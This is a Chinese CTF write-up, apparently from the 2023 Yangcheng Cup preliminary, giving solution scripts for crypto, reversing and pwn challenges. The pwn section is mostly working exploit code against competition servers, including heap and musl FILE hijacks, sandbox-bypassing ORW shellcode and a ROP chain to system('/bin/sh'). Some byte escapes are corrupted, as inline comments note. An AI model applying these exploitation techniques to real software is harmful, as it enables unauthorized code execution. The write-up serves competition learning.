私钥 DER 里大整数采用 TLV 编码:02 是 INTEGER 标签,81 81 表示长度为 0x81 = 129 字节(含一个前导 0x00 符号字节)。证书十六进制中前两处 02 81 81 之后的 0x81 个字节,分别就是 n 和 d。

from Crypto.Util.number import *from pwn import *
n=0x00B9AD332FB6B87D59B5B20B4AE880BA416D8724111F99A9ED498BCB365091D83DCC43FDFF9B607DF8A443BCADC79907C921E76B38003B5B0ECE660437803195EBFAB9A7E23FC0751228FDEEFE5591827523D7B79AD04D85E4DB5CAA13F28A7E0124357D0685E00F14CCBB9679979923C2531FF487F9BA2500ADE48995C315D913d=0x00974EBB2DA0BB0AFB3603970C3E17D8B044AF22070A3750B05B849DDEEF1D4A986182EED3832CC8BAFC316EEA36835042E96C0A85A23ABC637E72C7F0EA787DF06127FE9DC3D21B8DAE8018BDFFC345107D5271DDB6D5FBC01F8CBF73F44410D61E006208356F1C5B85515EFC708B34B676E78F18D4D3B68F5765D10B701F0361e=65537c = 91817924748361493215143897386603397612753451291462468066632608541316135642691873237492166541761504834463859351830616117238028454453831120079998631107520871612398404926417683282285787231775479511469825932022611941912754602165499500350038397852503264709127650106856760043956604644700201911063515109074933378818m=pow(c,d,n)m=long_to_bytes(m)key=b'C0ngr4tulati0n5_y0u_fou^d_m3'print(m[:-28]+xor(key,m[-28:]))
04
Re

1

blast

md5(md5($pass))

2

CSGO

BASE64换表 动调

3

ez加密器
import base64import structfrom Crypto.Cipher import DESraw_table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='new_table = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/='dictionary_decode = str.maketrans(new_table, raw_table)dictionary_encode = dict(zip(dictionary_decode.values(),dictionary_decode.keys()))ciphertext = bytes.fromhex('0723105D5C12217DCDC3601F5ECB54DA9CCEC2279F1684A13A0D716D17217F4C9EA85FF1A42795731CA3C55D3A4D7BEA')for i in range(999999):    result_b64 = base64.b64encode(str(i).encode()).decode()    new_result_b64 = result_b64.translate(dictionary_encode)    key = new_result_b64[:8]    if len(key) >= 8:        try:             cipher = DES.new(key.encode(), DES.MODE_ECB)            plaintext = cipher.decrypt(ciphertext)            if "DASCTF" in plaintext.decode():                print(plaintext)                break        except:            continueDASCTF{f771b96b71514bb6bc20f3275fa9404e}

4

vm_wo

整体加密逻辑很简单:每个字节先异或 0x2b,再左移 1 位并加 1;比较容易直接猜出来再逆回去。

05
Pwn

1

cookieBox
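#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL

# Python 2 / pwntools exploit for cookieBox (musl libc 1.1.24): str payloads, iterator .next().
# The '\x7f', '\x00' and '\n' escapes had lost their backslashes in the page's rendering and
# are restored here — without them the leak parsing and the fake FILE are wrong.
context.log_level='debug'
elfelf='./cookieBox'
#context.arch='amd64'
while True :
  # try :
    elf=ELF(elfelf)
    context.arch=elf.arch

    gdb_text='''
      telescope $rebase(0x202040) 16
      '''

    if len(sys.argv)==1 :
      # Local run: attach gdb, use the musl build installed under /musl/1.1.24.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=process(elfelf)
      gdb_open=1
      # io=process(['./'],env={'LD_PRELOAD':'./'})
      clibc.srand(clibc.time(0))
      libc=ELF('/musl/1.1.24/amd64/lib/libc.so')
      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
      # Remote run: the organiser's libc.so has to sit next to the script.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=remote('tcp.cloud.dasctf.com',24659)
      gdb_open=0
      clibc.srand(clibc.time(0))
      libc=ELF('./libc.so')
      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

    def gdb_attach(io,a):
      if gdb_open==1 :
        gdb.attach(io,a)

    # Menu wrappers: 1=add, 2=delete, 3=edit, 4=show (index-based).
    def choice(a):
      io.sendlineafter('>>',str(a))

    def add(a,b):
      choice(1)
      io.sendlineafter('size:\n',str(a))
      io.sendafter('Content:\n',b)

    def edit(a,b):
      choice(3)
      io.sendlineafter('idx:\n',str(a))
      io.sendafter('content:\n',b)

    def show(a):
      choice(4)
      io.sendlineafter('idx:\n',str(a))

    def delete(a):
      choice(2)
      io.sendlineafter('idx:\n',str(a))

    # Leak: free one chunk, reallocate the same size and show() the new slot — the freed
    # chunk still carries an allocator pointer that prints as a libc address.
    add(0x40,'aaaaaaaa')
    add(0x40,'aaaaaaaa')
    add(0x40,'aaaaaaaa')
    add(0x40,'aaaaaaaa')
    add(0x90,'aaaaaaaa')
    delete(2)
    add(0x40,'aaaaaaaa')
    show(5)

    # The leaked value points 0x30 into musl's `mal` allocator state, hence libc base = leak - mal - 0x30.
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['mal']-0x30
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    # ROP gadgets from the template; not used by this exploit.
    pop_rax_ret=libc.search(asm('pop rax;ret')).next()
    pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()
    pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()
    pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()
    syscall_ret=libc.search(asm('syscall;ret')).next()

    # Edit-after-free on idx 5: first point the chunk list entries (0x602070 in the binary)
    # at themselves, then at __stdout_FILE, so that edit(4, ...) writes over stdout's FILE.
    # (Inferred from the offsets used; confirm against the binary's chunk table layout.)
    delete(2)
    edit(5,p64(0x602070)+p64(0x602070+8))
    delete(3)
    edit(5,p64(libc.sym['__stdout_FILE'])*2)

    # Fake musl FILE: the flags field doubles as the "/bin/sh" string, wpos != wbase marks the
    # buffer dirty, so the exit-time flush calls f->write(f, ...) == system("/bin/sh") with the
    # FILE pointer itself as the first argument. Field names follow struct _IO_FILE in musl.
    fake_file = ""
    fake_file += "/bin/sh".ljust(8, '\x00')  # flags
    fake_file += p64(0)  # rpos
    fake_file += p64(0)  # rend
    fake_file += p64(0)  # close
    fake_file += p64(0)  # wend
    fake_file += p64(114514)  # wpos
    fake_file += p64(0)  # mustbezero_1
    fake_file += p64(1919810)  # wbase
    fake_file += p64(0)  # read
    fake_file += p64(system_addr)  # write

    edit(4,fake_file)

    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))

    gdb_attach(io,gdb_text)
    io.interactive()

  # except Exception as e:
  #   io.close()
  #   continue
  # else:
  #   continue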

2

easy_vm
#coding:utf-8
from pwn import *

# Python 2 / pwntools exploit for easy_vm (the .next() calls further down are Python 2 syntax).
# `sys` is available through pwn's star import.
context.log_level='debug'
elfelf='./pwn'
elf=ELF(elfelf)
context.arch=elf.arch
# gdb script for local runs: break at exit, where the overwritten hook is expected to fire.
gdb_text='''b exit  '''

# one_gadgaet (sic) is a template leftover and is never used below.
if len(sys.argv)==1 :
  # Local, with gdb attached.
  io=process(elfelf)
  gdb_open=1
  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' :
  # Local, no gdb.
  io=process(elfelf)
  gdb_open=0
  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
  # Remote: needs the organiser's libc-2.23.so next to the script (offsets below assume 2.23).
  io=remote('tcp.cloud.dasctf.com',24486)
  gdb_open=0
  libc=ELF('./libc-2.23.so')
  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)    sleep(0.2)
def pop():  return p64(2)
def push():  return p64(1)
def mov():  return p64(3)
def data_add(a):  return p64(6)+p64(a)
def data_sub(a):  return p64(7)+p64(a)


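# libc.address is still 0 here, so everything below is an OFFSET into libc, not a runtime address.
# Only system_addr feeds the payload; the rest is template leftover. ('\x00' restored — the page
# had dropped the backslash, which would have made the search miss.)
bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
pop_rax_ret=libc.search(asm('pop rax;ret')).next()
pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()
pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()
pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()
syscall_ret=libc.search(asm('syscall;ret')).next()


gdb_attach(io,gdb_text)
# VM program. Opcodes (see the helpers above): 1=push, 2=pop, 3=mov, 6=data+=imm, 7=data-=imm.
# Reading of the arithmetic: the VM's data word apparently starts out holding a pointer into
# main_arena (__malloc_hook+0x10 is main_arena in glibc 2.23, +88 its top pointer), so subtracting
# that offset leaves the libc base; 0xf1147 is a libc-2.23 one_gadget; the second add moves the
# word to system plus a constant whose meaning depends on the VM. Confirm against the VM's
# semantics before reusing.
pay=pop()+push()*4+data_sub(libc.sym['__malloc_hook']+0x10+88)+push()
pay+=data_add(0xf1147)+push()+data_add(0x5abbb8+system_addr-0xf1147)+mov()
pay+=pop()



io.recv()
io.send(pay)

io.interactive()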

3

shellcode

题目只给 0x10 字节可执行空间:先用这一小段 shellcode 触发第二次 read,把更长的 shellcode 读到栈上,然后用 open/read/write(ORW)读 flag——不依赖 execve,从而绕过沙箱。

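from pwn import *
#from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['tmux','splitw','-h']
filename = './shellcode'
debug = 0
ip = 'tcp.cloud.dasctf.com'
port = 27552

if debug:
    p = process(filename)
else:
    p  = remote(ip,port)

# pwntools shorthands (template boilerplate; only ru/sa/s are used below).
# The '\xf7' / '\x7f' / '\x00' escapes had lost their backslashes in the page's rendering.
ru      = lambda a:     p.recvuntil(a)
r       = lambda n:     p.recv(n)
sla     = lambda a,b:   p.sendlineafter(a,b)
sa      = lambda a,b:   p.sendafter(a,b)
sl      = lambda a:     p.sendline(a)
s       = lambda a:     p.send(a)
l32     = lambda  :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))   # 32-bit libc leak (top byte 0xf7)
l64     = lambda  :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))   # 64-bit libc leak (top byte 0x7f)
uu32    = lambda  :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda  :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))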

def inter() :
    """Drop into an interactive session on the tube ``p``."""
    p.interactive()
def debu(cmd=''):
    """Attach gdb to ``p`` with the gdb commands ``cmd`` and pause the script."""
    gdb.attach(p,cmd)
    pause()
def get_addr():
    """Read up to a 0x7f byte and unpack the last 6 bytes received as a little-endian pointer (escapes as published: backslashes lost)."""
    return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))
def get_sysbin(libc_base,libc):
    """Return the absolute addresses of ``system`` and a "/bin/sh" string for ``libc`` loaded at ``libc_base``."""
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
def csu(rdi, rsi, rdx, rip, gadget) :
    # NOTE(review): the body is a bare expression with no ``return`` and
    # refers to an undefined name ``debug_shellcode``; this looks like a
    # transcription error.  The helper is not called in this script, so it
    # is left as found.
    debug_shellcode+ p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
# Stage 1.  Answer the "[2] Input: (ye / no)" prompt with two bytes that,
# once their escapes are restored (\x0f\x05), are the x86-64 ``syscall``
# encoding; then, at the "P0P Code" prompt, send the 0x11-byte printable
# stub.  Per the write-up this stub uses the 0x10 bytes the program already
# executes to issue a second ``read`` so a larger payload can follow.  The
# commented-out ``payload`` and ``debu`` lines are the author's earlier
# attempt and debugger breakpoint.  (The trailing ``n`` in the prompt
# strings is a ``\n`` whose backslash was lost.)
sa(b'[2] Input: (ye / no)n',b'x0fx05')
ru(b'[5] ======== Input Your P0P Code ========n')
#payload = b'U^S_SX'+b'S'*(0x11-6)
payload = b'T^S_Sx58x5ax5ax5cx5ax52'.ljust(0x11,b'x52')
#debu('b *$rebase(0x14f2)')
s(payload)
# Stage 2.  For the second read: 0x4a bytes of padding followed by a
# shellcraft chain -- open "./flag", dup2 the returned fd onto 2, read 0x50
# bytes onto the stack, dup2 fd 1 onto 3, write the buffer to 3, exit.  No
# execve is issued, which is why the write-up says it gets past the syscall
# sandbox: a filter that only blocks execve still lets a file be read and
# echoed back, so such a sandbox also needs to constrain open/read/write.
shellcode = ''
shellcode += shellcraft.open('./flag')
shellcode += shellcraft.dup2('eax',2)
shellcode += shellcraft.read(2,'rsp',0x50)
shellcode += shellcraft.dup2(1,3)
shellcode += shellcraft.write(3,'rsp',0x50)
shellcode += shellcraft.exit(0)
shellcode = asm(shellcode)
s(b'a'*0x4a+shellcode)
inter()

4

heap
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./heap'
#context.arch='amd64'
# Exploit driver for the "heap" challenge (Python 2: str/bytes are mixed,
# e.g. 'a'+p64(...), and generators are advanced with ``.next()``).
# Everything runs inside a ``while True`` whose try/except is commented
# out, so on the happy path the body executes once and ends in
# io.interactive().  The target exposes a numeric menu driven through
# ``choice`` below (1 add, 2 show, 3 edit, 4 delete -- names taken from the
# helpers).  The host libc's rand() is seeded with time(0) and the script
# sleeps 3 s between steps; presumably the target uses time-based
# randomness and the pacing keeps both sides in step -- TODO confirm
# against the binary; note that the seeded ``clibc`` is never queried.
# NOTE(review): byte escapes such as 'x55', 'x7f', 'x00' have lost their
# backslashes in the published listing and read as plain letters here.
while True :
  # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''
      telescope $rebase(0x202040) 16
      '''
    # Local run (no argv): spawn the binary with gdb attach enabled;
    # otherwise connect to the remote instance and use the challenge's
    # libc (named ``libc-3.35.so`` by the author).  ``one_gadgaet`` (sic)
    # is assigned but never used.
    if len(sys.argv)==1 :
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=process(elfelf)
      gdb_open=1
      # io=process(['./'],env={'LD_PRELOAD':'./'})
      clibc.srand(clibc.time(0))
      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=remote('tcp.cloud.dasctf.com',28834)
      gdb_open=0
      clibc.srand(clibc.time(0))
      libc=ELF('./libc-3.35.so')
      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):
      """Attach gdb with command script ``a`` only when gdb_open is 1 (local run)."""
      if gdb_open==1 :
        gdb.attach(io,a)
    def choice(a):
      """Send one menu line ``a`` after the menu prompt (prompt text as published, escapes lost)."""
      io.sendlineafter('Your chocie:nn',a)
    def add(b):
      """Menu 1 with payload ``b`` (helper name: add a chunk)."""
      pay=str(1)+' '+b
      choice(pay)
    def edit(a,b):
      """Menu 3: write ``b`` into slot ``a``, sent as ``'3 idx:data'``."""
      pay=str(3)+' '+str(a)+':'+b
      choice(pay)
    def show(a):
      """Menu 2: print slot ``a``."""
      pay=str(2)+' '+str(a)
      choice(pay)
    def delete(a):
      """Menu 4: release slot ``a``."""
      pay=str(4)+' '+str(a)
      choice(pay)
    # Stage 1 -- heap-address leak.  Twelve 0x50-byte chunks are created and
    # each gets 0x28 bytes of filler plus a one-byte tail (0x55 once the
    # escape is restored).  A free / re-allocate / edit / free / re-allocate
    # sequence then leaves slot 12 holding 0x63 bytes of 'a' directly before
    # leftover heap data; show(12) prints it, and the 3 bytes after the
    # filler are widened (shifted up by 24 bits) into ``heap_base``.
    for i in range(12):
      add('a'*0x50)
      edit(i,'a'*0x28+'x55')
    sleep(3)
    add('a'*0x63)
    delete(0)
    add('a'*0x62)
    edit(12,'a'*0x63)
    delete(12)
    add('a'*0x58)
    sleep(3)
    show(12)
    io.recvuntil('a'*0x63)
    heap_base=u64('x00x00x00'+io.recv(3)+'x00x00')
    # Stage 2 -- two more free / overwrite / re-allocate rounds, each
    # patching the last two bytes of a 0x62-byte chunk (0x0d6f, then 0x0cf8
    # once the escapes are restored), followed by a one-byte tail written
    # into slot 3.  The author does not document what the indices and
    # constants refer to; they are left as found.
    io.sendline('')
    delete(2)
    add('a'*0x62)
    edit(0,'a'*0x60+'x6fx0d')
    delete(0)
    add('a'*0x58)
    sleep(3)
    io.sendline('')
    delete(6)
    add('a'*0x62)
    edit(2,'a'*0x60+'xf8x0c')
    delete(2)
    add('a'*0x58)
    sleep(3)
    io.sendline('')
    edit(3,'a'*9+'x08')
    sleep(3)
    io.sendline('')
    # From here on every out-of-chunk read or write follows one pattern:
    # edit(7, <one byte>), then edit(3, 'a' + <address>), then show(4) or
    # edit(4, ...).  The access pattern suggests slot 3 holds the pointer
    # that slot 4 resolves through and the byte in slot 7 selects something
    # about it -- an assumption from the shape of the calls, not verified.
    edit(7,'x09')
    sleep(3)
    io.sendline('')
    edit(3,'a'+p64(heap_base+0x111111))
    sleep(3)
    io.sendline('')
    # Stage 3 -- libc leak.  show(4) yields a pointer ending in 0x7f; the
    # script subtracts the _IO_2_1_stdin_ offset and then page-aligns the
    # result, which silently absorbs whatever the exact displacement from
    # _IO_2_1_stdin_ really is.  Of the symbols resolved afterwards only
    # ``pop_rdi_ret``, ``bin_sh_addr``, ``system_addr`` and ``environ_addr``
    # are used below.
    edit(7,'x04')
    sleep(3)
    io.sendline('')
    edit(3,'axa0x08')
    sleep(3)
    show(4)
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']
    libc_base=libc_base&0xfffffffffffff000
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/shx00').next()
    environ_addr=libc.sym['environ']
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    pop_rax_ret=libc.search(asm('pop rax;ret')).next()
    pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()
    pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()
    pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()
    syscall_ret=libc.search(asm('syscall;ret')).next()
    # Stage 4 -- stack leak through libc's ``environ`` pointer (read from
    # environ+1, so the low byte of the leaked value is discarded), with
    # 0x120 subtracted to reach the frame the chain is written into.
    io.sendline('')
    edit(7,'x07')
    sleep(3)
    edit(3,'a'+p64(environ_addr+1))
    sleep(3)
    edit(7,'x02')
    sleep(3)
    edit(3,'a')
    sleep(3)
    show(4)
    stack_addr=u64(io.recvuntil('x7f')[-6:]+'x00x00')-0x120
    # Stage 5 -- write four qwords at stack_addr, one per round:
    # pop_rdi_ret+1 (a lone ``ret``, presumably for 16-byte stack
    # alignment), pop_rdi_ret, the "/bin/sh" address, system.
    io.sendline('')
    edit(7,'x07')
    sleep(3)
    edit(3,'a'+p64(stack_addr))
    sleep(3)
    edit(4,p64(pop_rdi_ret+1))
    sleep(3)
    edit(3,'a'+p64(stack_addr+8))
    sleep(3)
    edit(4,p64(pop_rdi_ret))
    sleep(3)
    edit(3,'a'+p64(stack_addr+0x10))
    sleep(3)
    edit(4,p64(bin_sh_addr))
    sleep(3)
    edit(3,'a'+p64(stack_addr+0x18))
    sleep(3)
    edit(4,p64(system_addr))
    success('libc_base:'+hex(libc_base))
    success('heap_base:'+hex(heap_base))
    success('stack_addr:'+hex(stack_addr))
    gdb_attach(io,gdb_text)
    io.interactive()
  # except Exception as e:
  #   io.close()
  #   continue
  # else:
  #   continue

5

risky_login

用ghidra 反编译 RISC-V架构,发现存在栈溢出和后门函数,直接跳转到后门函数执行命令。

from pwn import *
#from LibcSearcher import *
# The write-up says the target is a RISC-V binary; ``arch='amd64'`` here
# only affects asm/shellcraft, neither of which this script uses, and
# ``p64`` is plain 8-byte little-endian packing.
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['tmux','splitw','-h']
# Connection settings: ``debug = 0`` selects the remote instance.  The
# empty ``filename`` means a local run (debug != 0) would not work as is.
filename = ''
debug = 0
ip = 'tcp.cloud.dasctf.com'
port = 29069
if debug:
    p = process(filename)
else:
    p  = remote(ip,port)
# Tube shorthands from the author's template (identical to the shellcode
# script's).  Only ``sla`` and ``sa`` are used in this exploit.
# NOTE(review): the byte escapes (b'xf7', b'x7f', b'x00') have lost their
# backslashes in the published listing and read as plain letters here.
ru      = lambda a:     p.recvuntil(a)
r       = lambda n:     p.recv(n)
sla     = lambda a,b:   p.sendlineafter(a,b)
sa      = lambda a,b:   p.sendafter(a,b)
sl      = lambda a:     p.sendline(a)
s       = lambda a:     p.send(a)
l32     = lambda  :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))
l64     = lambda  :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))
uu32    = lambda  :u32(p.recv(4).ljust(4,b'x00'))
uu64    = lambda  :u64(p.recv(6).ljust(8,b'x00'))
int16   = lambda data   :int(data,16)
lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))

def inter() :
    """Drop into an interactive session on the tube ``p``."""
    p.interactive()
def debu(cmd=''):
    """Attach gdb to ``p`` with the gdb commands ``cmd`` and pause the script."""
    gdb.attach(p,cmd)
    pause()
def get_addr():
    """Read up to a 0x7f byte and unpack the last 6 bytes received as a little-endian pointer (escapes as published: backslashes lost)."""
    return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))
def get_sysbin(libc_base,libc):
    """Return the absolute addresses of ``system`` and a "/bin/sh" string for ``libc`` loaded at ``libc_base``."""
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
def csu(rdi, rsi, rdx, rip, gadget) :
    """Build a ret2csu-style chain: ``gadget``, then the values popped into rbx=0, rbp=1, r12=rip, r13=rdi, r14=rsi, r15=rdx, then ``gadget - 0x1a`` (presumably the call block of __libc_csu_init, 0x1a bytes before the pop block).  Template helper; not used by this exploit."""
    return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
# Per the write-up (Ghidra on the RISC-V binary): the "Input ur words"
# read overflows its stack buffer and a backdoor function exists.  0x100
# bytes of filler reach the saved return slot and the next 8 bytes replace
# it with 0x123456ee -- presumably the backdoor's address; the backdoor
# then prompts for the command to run.  ``p64`` is plain 8-byte
# little-endian packing, so the amd64 ``context`` above does not matter.
sla(b'Input ur name:',b'r0ach')
payload = b'a'*0x100+p64(0x123456ee)
sa(b'Input ur words',payload)
sa(b'input what you want exec',b'cat f*')
inter()
admin
  • 本文由 发表于 2023年9月9日16:20:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
2023“羊城杯”网络安全大赛初赛-WriteUp By EDISEC
https://cn-sec.com/archives/2021595.html
